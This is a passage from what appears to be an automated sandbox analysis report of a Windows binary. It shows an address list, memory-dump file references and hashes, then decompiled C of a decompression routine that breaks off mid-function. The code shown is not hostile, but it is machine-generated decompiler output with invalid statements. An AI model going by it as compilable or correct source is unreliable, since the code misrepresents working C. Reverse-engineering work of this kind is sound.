                                                0x004063aa
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406810
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00406912
                                                0x004068cd
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068c2
                                                0x00000000
                                                0x004065f2
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00406912
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406637
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d0
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00406805
                                                0x00406582
                                                0x00406582
                                                0x00000000
                                                0x00406582
                                                0x00406803
                                                0x00406a38
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00406a6f
                                                0x00406a6f
                                                0x00000000
                                                0x00406a6f
                                                0x004068bc
                                                0x0040693c
                                                0x00406905

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                                • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
